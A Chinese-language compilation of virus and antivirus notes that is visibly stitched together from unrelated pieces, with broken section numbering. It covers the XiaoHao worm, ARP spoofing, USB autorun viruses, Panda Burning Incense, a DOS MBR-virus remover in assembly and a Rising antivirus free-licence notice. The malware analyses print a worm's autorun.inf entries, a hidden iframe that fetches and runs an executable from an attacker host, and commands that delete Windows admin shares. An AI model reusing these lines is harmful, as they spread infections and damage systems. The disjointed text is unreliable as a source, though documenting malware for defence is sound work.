病毒名称：Worm/XiaoHao.a
中 文 名：小浩蠕虫
病毒类型：蠕虫
危害等级：★★★★
影响平台：Win 9X/ME/NT/2000/XP/2003
病毒运行特征：
Worm/XiaoHao.a 蠕虫采用Visual C++6.0 工具编写，并经过UPX工具加壳处理，病毒运行后，会在每个硬盘根目录下释放病毒文件：
c:xiaohao.exe, 402706字节
c:autorun.inf, 91字节
其 中xiaohao.exe 文件为病毒主体，该文件运行后搜索全盘扩展名为*.exe 的文件，将自身病毒体写入到正常文件中，从而使原文件成为新的病毒 体，被感染后的文件图标为一个表示有“浩”字的图标，当浏览含有被感染病毒文件的窗口时，窗口的标题栏会有已中毒 X14o-H4o's Virus 的 字样。
如下图：



由于该病毒采用的是覆盖式写入，因此被感染后的文件无法恢复。

该病毒进程还会创建iexplore.exe 子进程，利用多个系统漏洞下载木马病毒。

另外，病毒还在各个硬盘跟目录下释放的autorun.inf 文件是病毒主体的伴生文件，该文件内容如下：
[Autorun]
open=Xiaohao.exe
shellexecute=Xiaohao.exe
shellAutocommand=Xiaohao.exe
这样，该病毒就可以利用Windows系统的自动播放功能借助与U盘来传播，当用户在不知情的情况下，双击已感染该病毒的U盘时，就会将病毒传播到新的系统中。

该病毒还会搜索全盘中扩展名为*.htm、*.html、*.asp、*.aspx、*.php、*.jsp 的网页脚本文件，向其中插入恶意网址连接<iframe src=http://xiaohao.yona.biz/***.htm width=0 height=0></iframe>， 该病毒网址会利用MS06-014、MS06-046、MS07-017 等多个系统漏洞下载并且执行病毒文件http: //xiaohao.yona.biz/***.exe ，该文件为病毒体自身。

该病毒会将系统时间修改为2005年1月17日，使一些杀毒软件的使用授权失效，病毒还会模拟鼠标操作，企图绕过杀毒软件的主动防御功能。

该病毒会将其他未被感染的文件设置成隐藏属性，还会生成文件：c:Jilu.txt，用以记录被感染的文件和被隐藏的文件。该病毒还会破坏注册表相关键值，使其不能显示隐藏文件，严重影响了电脑的正常使用。

据悉，该病毒作者还将病毒源代码公开在互联网中，并且还留下了自己的QQ号和博客地址，称“欢迎各位大牛. 来指导我  或者是交流” ，具有明显的技术炫耀性。

ARP病毒的症状

有时候无法正常上网，有时候有好了，包括访问网上邻居也是如此，拷贝文件无法完成，出现错误；局域网内的ARP包爆增，使用ARP查询的时候会发现不正常的MAC地址，或者是错误的MAC地址对应，还有就是一个MAC地址对应多个IP的情况也会有出现。

ARP攻击的原理

ARP欺骗攻击的包一般有以下两个特点，满足之一可视为攻击包报警：第一以太网数据 包头的源地址、目标地址和ARP数据包的协议地址不匹配。或者，ARP数据包的发送和目标地址不在自己网络网卡MAC数据库内，或者与自己网络MAC数据 库MAC/IP不匹配。这些统统第一时间报警，查这些数据包(以太网数据包)的源地址(也有可能伪造)，就大致知道那台机器在发起攻击了。现在有网络管理 工具比如网络执法官、P2P终结者也会使用同样的方式来伪装成网关，欺骗客户端对网关的访问，也就是会获取发到网关的流量，从而实现网络流量管理和网络监 控等功能，同时也会对网络管理带来潜在的危害，就是可以很容易的获取用户的密码等相关信息。

处理办法

通用的处理流程

1.先保证网络正常运行

方法一：编辑一个***.bat文件内容如下：

arp.exe s
**.**.**.**（网关ip） ****
**
**
**
**（
网关MAC地址）
end

办法二：编辑一个注册表问题，键值如下：

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MAC"="arp s
网关IP地址网关MAC地址"

2.找到感染ARP病毒的机器

a、在电脑上ping一下网关的IP地址，然后使用ARP －a的命令看得到的网关对应的MAC地址是否与实际情况相符，如不符，可去查找与该MAC地址对应的电脑。

b、使用抓包工具，分析所得到的ARP数据报。有些ARP病毒是会把通往网关的路径 指向自己，有些是发出虚假ARP回应包来混淆网络通信。第一种处理比较容易，第二种处理比较困难，如果杀毒软件不能正确识别病毒的话，往往需要手工查找感 染病毒的电脑和手工处理病毒，比较困难。

c、使用MAC地址扫描工具，Nbtscan扫描全网段IP地址和MAC地址对应表，有助于判断感染ARP病毒对应MAC地址和IP地址。

预防措施

1、及时升级客户端的操作系统和应用程式补丁；

2、安装和更新杀毒软件。

3、如果网络规模较少，尽量使用手动指定IP设置，而不是使用DHCP来分配IP地址。

4、如果交换机支持，在交换机上绑定MAC地址与IP地址。（不过这个实在不是好主意）

如果考虑到电子邮件用户大批量BCC发送电子邮件,全球受“风暴蠕虫”病毒感染的电脑数量还要更高.风暴蠕虫病毒一个晚上就扩散到很大范围,这要归功于垃圾邮件帮忙传播.风暴蠕虫病毒正在全球大规模迅速扩散.风暴蠕虫病毒的实际名称是“Small.DAM”.风暴蠕虫病毒的起源目前还不清楚.

以下主题的电子邮件都有可能包含风暴蠕虫病毒:

230 dead as storm batters Europe.
A killer at 11, he's free at 21 and...
British Muslims Genocide
Naked teens attack home director.
U.S. Secretary of State Condoleezza...

F-Secure表示,风暴蠕虫病毒属于木马类型,受感染的计算机将被远程控制作为“肉机”,来进行诸如“拒绝服务”等类型的攻击或者数据迁移.

U盘病毒简述:
　　U盘(自动运行)类病毒(auto病毒)近来非常常见,并且具有一定程度危害,它的机理是依赖Windows的自动运行功能,使得我们在点击打开磁盘的时候,自动执行相关的文件.目前我们使用U盘都十分频繁,当我们享受U盘所带来的方便时,U盘病毒也在悄悄利用系统的自动运行功能肆意传播,目前流行的 U盘病毒文件大家甚至耳熟能详了,比如经常有网友问的SSS.EXE SXS.EXE如何查杀这类的,下面我们将对U盘病毒极其特性和防范办法进行分析总结.

二、特性分析:

　　所谓的自动运行功能是指Windows系统一种方便特性，使当光盘、U盘插入到机器自动运行，而这种特性的实现就是通过磁盘跟目录下的 autorun.inf文件进行。这个文件保存在驱动器的根目录下(一般会是一个隐藏属性的系统文件)，它保存着一些简单的命令，告知系统新插入的光盘或 U盘应该自动启动什么程序等。

　　　　常见的Autorun.inf文件格式大致如下：

　　　　[AutoRun]　　　　//表示AutoRun部分开始，必须输入
　　　　 icon=C:C.ico　　//指定给C盘一个个性化的盘符图标C.ico
　　　　 open=C:1.exe　　//指定要运行程序的路径和名称，只要在此放入病毒程序就可自动运行；

　　在Windows系统有允许和阻止自动运行的键值的方法：

　　在注册表中找到如下键：

       键路径：[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExploer]

       在右侧窗格中有 "NoDriveTypeAutoRun"这个键决定了是否执行Autorun功能.其中每一位代表一个设备,不同设备用以下数值表示:

       设备名称 第几位 值 设备用如下数值表示 设备名称含义
       DRIVE_UNKNOWN 0 1 01h 不能识别的类型设备
       DRIVE_NO_ROOT_DIR 1 0 02h 没有根目录的驱动器
       DRIVE_REMOVABLE 2 1 04h 可移动驱动器
       DRIVE_FIXED 3 0 08h 固定的驱动器
       DRIVE_REMOTE 4 1 10h 网络驱动器
       DRIVE_CDROM 5 0 20h 光驱
       DRIVE_RAMDISK 6 0 40h RAM磁盘

       其中： 保留 7 1 80h 　未指定的驱动器类型

       以上值"0"表示设备运行，"1"表示设备不运行。
       从上面可以看出，对应的DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK是可以自动运行的。所以要禁止硬盘自动运行AutoRun.inf文件，就必须将DRIVE_FIXED这些键的值设为1，由于DRIVE_FIXED代表固定的驱动器(即硬盘)。如果仅想禁止软件光盘的AutoRun功能，但又保留对CD音频碟的自动播放能力，这时只需将“NoDriveTypeAutoRun”的键值改为：BD,00,00,00即可。

　　 U盘病毒就是利用这种系统特性，一般在感染后会修改系统的注册表，将显示所有文件的选项设置为禁止。甚至修改磁盘关联，杀毒软件一般会只把病毒文件清除，但对残余的文件不会处理。这也是常见的杀毒软件为什么常常无法清除干净，或者清除后双击无法打开磁盘的原因。

三、解决方案：

　　　 1、使用超级巡警套装来全面解决U盘病毒问题(推荐!):

①超级巡警对U盘病毒检测进行了特别的处理，可以快速的监测和定位U盘病毒，并清除它们。
②超级巡警同时还提供对注册表关联修复和自动运行阻止的处理。

2、手动解决办法：

①根据上面的原理，自己修改注册表禁止磁盘的自动运行特性。
②把文件夹选项中隐藏受保护的操作系统文件钩掉，选中显示所有文件和文件夹，点击确定。这样可以在感染病毒的移动存储设备中会看到几个文件(包括autorun.inf和病毒文件)，删除后，病毒就清除了。

二、对系统的破坏：

熊猫烧香在感染的系统上，会关闭杀毒软件进程，删除杀毒软件的注册表项目，禁用杀毒软件的服务，修改资源管理器不显示隐藏文件等。

还会调用如下命令来删除共享：
cmd.exe /c net share C$ /del /y
cmd.exe /c net share D$ /del /y
cmd.exe /c net share admin$ /del /y
....

旧变种会全面感染系统文件，新变种会感染除系统目录外的文件，即尽量不感染微软操作系统自身的文件。

新旧变种都会删除.gho，一般人会在安装完成系统后，使用Norton Ghost进行备份，熊猫会恶意删除这个备份文件。

其中一个变种还会在感染目录生成desktop_.ini。

最大的破坏是，熊猫烧香本身就是一种下载者，会在指定的网站下载后门、木马、各种盗号程序，甚至DDoS程序。

三、为什么无法清除干净，如何彻底查杀：

有人使用了超级巡警和巡警之熊猫专杀后，将一个机子杀干净了，但不久又发现感染了，这是因为，熊猫烧香在感染了一个系统后，开启一个单独的线程进行C类网络扫描感染，访问同网段的139/445端口，进行IPC$密码猜解和查找共享，并感染共享中的文件。这样只要网络内有一个机子还有存活的熊猫烧香病毒，就依然存在再次感染全网的可能。

许多朋友网络内都是有文件共享服务器，电影服务器，而许多网友的网络内的人都为了方便系统登录口令都是空口令，或者是123这样的简单口令。

局域网中有个IE没有打病毒，浏览挂了熊猫烧香病毒的网站，并不知情。

查杀的办法是：

1、断开网络，使用超级巡警之熊猫烧香专杀，每个机子全面杀毒。
2、修改口令，取消本地共享目录。
3、查杀完成后使用超级巡警的补丁检查检查系统没有打的补丁，及时打上补丁，尤其是IE补丁。

最新版巡警已经内置了最新专杀，请到官方网站http://dswlab.com中推荐的下载地址去下载!

Anti-virus collection by V.Bontchev
F-Prot
File Shiled by McAfee
NOD of Slovak AV
TbScan
AVP by E.Kaspersky
Dr.Web by Igor Daniloff
Norton AV
Solomon's Toolkit
LEVEL3 virus dedicated AV by SAC
IBM Anti-Virus

=====================================================================
.model tiny
.radix 16
.code
org 100
start:
mov dx,offset message
mov ah,09
int 21
xor ax,ax
int 16
or al,20
cmp al,'y'
je Goforit
mov dx,offset notdone
mov ah,09
int 21
mov ax,4c01
int 21
GoForIt:
xor ax,ax
mov ds,ax
mov ax,word ptr ds:[413]
mov cs:ConvMEM,ax
mov di,offset Int13
mov si,13*4
movsw
movsw
push cs
pop ds
cmp ConvMem,280
je RegConvMem
mov ah,09
mov dx,offset StrangeConv
int 21
RegCOnvMem:
mov ax,0201
mov bx,offset OrgSector
mov cx,1
mov dx,80
int 13
call TunnelInterrupts
mov ax,0201
mov bx,offset NewSec
mov cx,1
mov dx,80
int 13
push cs cs
pop es ds
mov di,offset NewSec
mov si,offset OrgSector
mov cx,200
repz cmpsb
jcxz NoDifference
mov ax,0301
mov bx,offset OrgSector
mov cx,1
mov dx,80
int 13
mov ah,3c
mov dx,offset sample
xor cx,cx
int 21
xchg bx,ax
mov ah,40
mov dx,offset NewSec
mov cx,200
int 21
mov ah,3e
int 21
LOCKEMIN:
cli
mov ah,09
mov dx,offset fixed
int 21
xor ax,ax
int 16
jmp LOCKEMIN
Nodifference:
mov ah,09
mov dx,offset noprob
int 21
mov ax,4c00
int 21
TunnelInterrupts:
push ax bx cx dx es ds si di
xor ax,ax
mov ds,ax
push word ptr ds:[04]
push word ptr ds:[06]
cli
mov word ptr ds:[04],offset Int1
mov word ptr ds:[06],cs
pushf
pushf
pop ax
or ax,100
push ax
popf
xor ax,ax
call dword ptr cs:[int13] ;tunnel interrupt 13
pushf
pop ax
and ax,0feff
push ax
popf
ExitTunnel:
les bx,dword ptr cs:[Root13]
cli
xor ax,ax
mov ds,ax
pop word ptr ds:[06]
pop word ptr ds:[04]
mov word ptr ds:[13*4],bx
mov word ptr ds:[13*4+2],es
sti
pop di si ds es dx cx bx ax
ret
Int1:
cmp cs:found,1
je exitint1
push bp
mov bp,sp
push ax bx cx dx es ds si di
mov ax,ss:[bp+2]
mov cx,4
shr ax,cl
add ax,ss:[bp+4]
cmp ax,0c000
jb DoneInt1
mov cs:found,1
les bx,SS:[bp+2]
mov word ptr cs:[Root13],bx
mov word ptr cs:[Root13+2],es
DoneInt1:
pop di si ds es dx cx bx ax bp
exitint1:
iret
StrangeConv db 0a,0dh,'Conventional Memory Suspicious.',0a,0dh,24
Fixed db 0a,0dh,'Virus Cleaned - sample saved in VIRUS.MBR .',0a,0dh
db 'Now COLD REBOOT IMMEDIATELY!!!!!!!!!!!!!!!!',0a,0dh,24
NoProb db 0a,0dh,'No Stealthing Detected. No Action Taken.',0a,0dh,24
notdone db 0a,0dh,'No Action Taken.',0a,0dh,24
Message:
db 0a,0dh
db '--==[Stormbringer''s Instant Stealth MBR Virus Remover.]==--',0a,0dh
db ' USE AT YOUR OWN RISK! RTFM Before Using! ',0a,0dh
db 0a,0dh,'Continue (y/N)',24
sample db 'Virus.MBR',0
found db 0
NewSec db 200 dup(?)
OrgSector db 200 dup(?)
Int13 dd ?
Root13 dd ?
ConvMem dw ?
end start
======================================================================

======================================================================
unp proc
call readTitle
jc noUnp
cmp varNP,0
je noUnp
call scanPack
noUnp:
ret
endp
scanPack proc
push ax bx cx dx bp di es
mov es,baseSeg
mov di,regIP
lea si,sigUnp
noLastSig:
push si
scanMore:
call scanChSumB ;1
jne nextSig
......
======================================================================

======================================================================
Valert y0Jny5dM+OMjnm-2mljm7hpsUBQrVAqq5M6i05mO0m+4gBqYUlBNBU
Taiwan OVn5aMFMA6-KNMqpYCbw-qCOqWQBEPDX553mpwNRvlehJgNldYp6Bz
Durban fEJn-jPjD2m5mjIrJb8oKcVZJMgmhkBcjcaOMnjj3YnYjvuDtW
Pretoria G7kmu5s5rypVosPPtvczLY7fKUc5MjucEPYkkM7F0od24-HW
XA1 g0knPMSjgjKH5mj5PhOA4gK6l7jr8KJWYhOKw3mm8KgCHYMM-W
Kennedy h0ljSMDMd864oME5TM+YjgeKpLuHbjmjah0fuOTM0ptAfu6LZI
8-tunes jp1TKjd5htmjnMZcwNwj+THd70MrOFFKM4X55TjjURT5JMBsnv
Virdem NWk5s5Ij9osXSctXAX82MMnmm674Rtw09rkRDu7e9fTlbO479rNbvdIipT
======================================================================

======================================================================
.!.:rc393,[VD/SLAM]
.:0.:16.:66.:00.:0C 4F8E 0D9A.:3E.:0C.:20 BC46 CF5D.:AUTO+.:62.:0.:AUTO
.!.:rc393,[VD/SLAM]
.:0.:16.:E9.:00.:0C 2A7F 96BF.:DD.:0C.:20 48A4 2DBD.:AUTO+.:152.:0.:AUTO
======================================================================

1、高速的扫描/特征匹配算法。
2、合理的病毒库，大量的病毒样本，完善的病毒清除方法。
3、产品线全面，各种主流系统的兼容DOS/Win9x/Winnt/2000，NOVELL、LINUX/UNIX四处开花。
4、以监控为主的防护概念普及和应用。
5、启发扫描、虚拟机、人工智能全面应用。
直到今天，这些技术依然是整个AV体制的坚石和基础，而今天AV技术的发展却缓慢鲜有创新。

From author:
~~~~~~~~~~~~
I write this program, because AV programs like AVP or DrWeb can't cure
some of my virii :) Sorry, this version not tested archives and packed
files. They test only COM/EXE files. Make report at dav.rep file.
Detected all HLL-virii from DVL #3 - #4.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

相关链接:金山毒霸全面免费,紧急救援

消息如下:

[快讯]台湾地震致使海底光缆中断，由于许多国外杀毒软件在中国大陆地区没有升级服务器，使得数百万国内个人用户、数十万企业和政府局域网用户无法升级。根据中国电信和中国网通的消息，光缆被完全修复可能需要一个月的时间。

瑞星安全专家分析，由于年底正是各种病毒肆虐的高峰，近一个月时间无法升级杀毒软件，几乎意味着用户的电脑完全向病毒和黑客敞开了大门，而如此庞大数量的电脑被病毒攻陷，则会变成巨大的病毒感染源和黑客攻击平台（BotNet），因此整个互联网都面临着瘫痪的危险。

在这样的危急时刻，国内最大的信息安全厂商瑞星公司毅然作出重大决定：从2006年12月29日至2007年1月29日，瑞星杀毒软件完全免费一个月。如果届时海底光缆仍存在问题，瑞星将考虑延长免费使用期限。

瑞星副总裁毛一丁表示，虽然该措施将导致瑞星公司的商业收益遭受重大损失，但是为了避免国内互联网出现灾难性的病毒肆虐，作为信息安全领域的领袖厂商，瑞星有责任、有义务承担起危机时刻的社会责任。

目前，瑞星官方网站已经做好了充分的准备，国内所有用户都可以登陆瑞星网站，免费下载、使用瑞星杀毒软件。

个人用户：

请登陆http://go.rising.com.cn/download/transfer.asp?ver=comp,下载瑞星杀毒软件，登陆http://fw.rising.com.cn/download/transfer.asp?ver=comp，下载瑞星个人防火墙，瑞星杀毒、防火墙组合版公用免费序列号：（产品序列号：CSA5V1-S7RJNG-EQV4S6-G8E200，用户ID：U2MZUAJ6QFVR）。

企业和政府用户（局域网）：

请登陆http://download.rising.com.cn/for_down/ravnetver/ravnet_setup.exe，下载瑞星杀毒软件网络版免费使用。瑞星客户服务工程师将随时待命，为企业用户提供安装、设置等全程技术支持。瑞星杀毒软件网络版公用免费序列号：（1W9EVK-05RBUL-28W1S3-HCE208）。

链接:

地震使国外杀软无法升级 瑞星杀毒软件免费一个月

以下是瑞星首推的创新技术:

我还没有安装到正式版的瑞星07,也不知道到底个如何的好,不过至于这些技术,我觉得年年都如此,年年都要有主打的产品技术推荐,因此也不足为奇了.真正目前是否能很好的对付流氓和恶意软件已经成为当务之急,希望07版的瑞星在这个方面不会让人失望~~

不过瑞星的脱壳引擎确实公测了蛮久了,第八带脱壳技术应该来说还是有很大程度的提高,这个来讲作为卖点是无可厚非的.至于那几个专利技术嘛,还是说算了...后面那些独占式抢先杀毒技术,漏洞攻击防火墙联动系统等等,这些名字确实蛮好听的,蛮吸引人的...

最终如何,还得用了才能说好不好呀,但愿能有新的体验~~~